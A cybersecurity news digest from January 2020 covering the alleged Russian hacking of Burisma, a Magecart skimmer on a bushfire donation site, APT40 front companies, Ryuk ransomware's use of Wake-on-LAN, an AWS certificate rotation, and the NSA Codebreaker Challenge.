Skip to main content

Russia Hacks Burisma, Ryuk Ransomware & Patch Tuesday!

Russia Hacks Burisma, Ryuk Ransomware & Patch Tuesday!

Today is Tuesday January 14th, 2020 and here are today’s most pressing cyber stories in under 5 minutes.

 

Russia Hacks Ukrainian Gas Firm in the midst of impeachment

Russian military hackers have allegedly launched cyberattacks on Burisma, a Ukrainian gas company at the heart of US President Trump's impeachment case.  

 

According to a report published on Monday by the New York Times, cyberattack salvos were fired during November, at the same time that Ukrainian President Volodymyr Zelensky was being pressured by Trump to investigate former Vice President to Barack Obama, Joseph Biden, alongside his son Hunter -- of which whom served on the board of the utility.

 

While it is not known what the hackers were searching for, according to the NYT, cybercriminals under the umbrella of the Russian military "could be searching for potentially embarrassing material on the Bidens -- the same kind of information that Trump wanted from Ukraine." 

The style and nature of the attacks on the gas company were similar to those launched against the Democratic National Committee (DNC) in 2016.

 

It is suspected that the hack was prompted by Russia's desire to interfere with the election. The country has repeatedly denied any involvement. 

Good Samaritans helping Aussies with Forest Fire get hit by credit card skimming

Attackers have compromised a website collecting donations for the victims of the Australia bushfires and injected a malicious script that steals the payment information of the donors.

This type of attack is called Magecart and involves hackers compromising a web site and injecting malicious JavaScript into eCommerce or checkout pages. These scripts will then steal any credit cards or payment information that is submitted and send it off to a remote site under the attacker's control.

The Malwarebytes Threat Intelligence Team has discovered a legitimate web site collecting donations for the tragic bushfires in Australia that has been compromised by a Magecart script.

While the donors were probably not targeted by this attack, they are unfortunately caught in the cross fire.

 

When a visitor of the site adds an item to their cart, such as a donation, a malicious credit-card skimmer script named ATMZOW will be loaded into the checkout pages. 

 

When a user submits their payment information as part of the checkout process, the malicious script will steal the submitted information and send it to the vamberlo[.]com domain. 

 

China’s APT40 Hides behind network of front companies

 

An online group of cyber-security analysts calling themselves Intrusion Truth have doxed their fourth Chinese state-sponsored hacking operation. "APT groups in China have a common blueprint: contract hackers and specialists, front companies, and an intelligence officer," the Intrusion Truth team said. "We know that multiple areas of China each have their own APT."

 

While Intrusion Truth has not specifically linked the subjects of its recent blog posts to a particular Chinese hacking group, experts from FireEye and Kaspersky have said that Intrusion Truth's latest revelations refer to a Chinese hacking group they've been previously tracking as APT40.                                                                                                                                                      

Per FireEye, APT40 is a Chinese cyber espionage group that's been active since 2013. The group typically targeted countries strategically important to China's Belt and Road Initiative, especially those with a focus on engineering and defense. These companies use overlapping contact details, share office locations, and don't have any presence online except to recruit cyber-security experts with offensive security skills, using almost identical job ads.                                  

 

In fact, one of the 13 front companies they identified was headquartered in the University's library. This professor was also a former member of China's military, Intrusion Truth said.  Intrusion Truth has a pretty good track record to their name. From their previous three Chinese APT doxes, US authorities have followed through with official indictments in two cases -- namely APT3 and APT10 -- filling official charges against APT group members in November 2017 and December 2018, respectively. 

 

Ryuk Ransomware uses Wak-on-Lan                                                                                                                  

The Ryuk Ransomware uses the Wake-on-Lan feature to turn on powered off devices on a compromised network to have greater success encrypting them. 

                                      

Wake-on-Lan is a hardware feature that allows a powered down device to be woken up, or powered on, by sending a special network packet to it. This is useful for administrators who may need to push out updates to a computer or perform scheduled tasks when it is powered down.  According to a recent analysis of the Ryuk Ransomware by Head of SentinelLabs Vitali Kremez, when the malware is executed it will spawn subprocesses with the argument '8 LAN'. When this argument is used, Ryuk will scan the device's ARP table, which is a list of known IP addresses on the network and their associated mac addresses, and check if the entries are part of the private IP address subnets of "10.", "172.16.", and "192.168." 

 

If the ARP entry is part of any of those networks, Ryuk will send a Wake-on-Lan (WoL) packet to the device's MAC address to have it power up. This WoL request comes in the form of a 'magic packet' containing 'FF FF FF FF FF FF FF FF'.

 

If they can mount the share, Ryuk will encrypt that remote computer's drive as well. To mitigate this new feature, administrators should only allow Wake-on-Lan packets from administrative devices and workstations.

 

This would allow administrators to still benefit from this feature while adding some security to the endpoints. 

At the same time, this does not help if an administrative workstation is compromised, which happens quite often in targeted ransomware attacks.

 

AWS Issues warning to its users 

                                                                                         

Amazon Web Services has issued an "important" warning to users of its Amazon Aurora, Amazon Relational Database Service (RDS), and Amazon DocumentDB (with MongoDB compatibility) databases, urging them to update their certificates by January 14, 2020.  Those who use SSL/TLS certificate validation when they connect to database instances are urged to download and install a fresh certificate, rotate the certificate authority (CA) for the instances, and reboot the instances. Users who don't have SSL/TLS connections or certificate validation don't need to make any updates; however, AWS advises doing so in case they want to use SSL/TLS connections in the future.

                                                                                                

This process is standard: SSL/TLS certificates for RDS, Aurora, and DocumentDB expire and are replaced every five years as part of standard maintenance. Users may already have received an email or console notification alerting them to the process.         

                                             

Instances created on or after January 14 will have the new (CA-2019) certificates, made available in September 2019. Users can temporarily switch back to the old (CA-2015) certificates if needed. CA-2015 certificates will expire on March 5, 2020; at this point, applications that use certificate validation but haven't been updated will lose connectivity.
 

UNG Wins NSA Codebreakers Challenge                

                                                                     

The University of North Georgia (UNG) scored a decisive victory in the 2019 National Security Agency (NSA) Codebreaker Challenge, which ran for 110 days and finished Jan. 10. UNG students, faculty and staff tallied 230,450 points, more than tripling second-place Georgia Tech's 56,050. Third-place Oregon State University was the only other school to top 40,000 points. A total of 531 universities and colleges competed.

 

"I'm proud to be the coach of the No. 1 cyber operations university team in America," said Dr. Bryson Payne, director of UNG's Center for Cyber Operations Education and professor of computer science. "These young men and women have worked harder over the past 110 days than any other team in the country."

UNG had 184 of its participants complete at least one of the seven tasks, one of which consisted of two parts. Thirty UNG participants finished all seven tasks.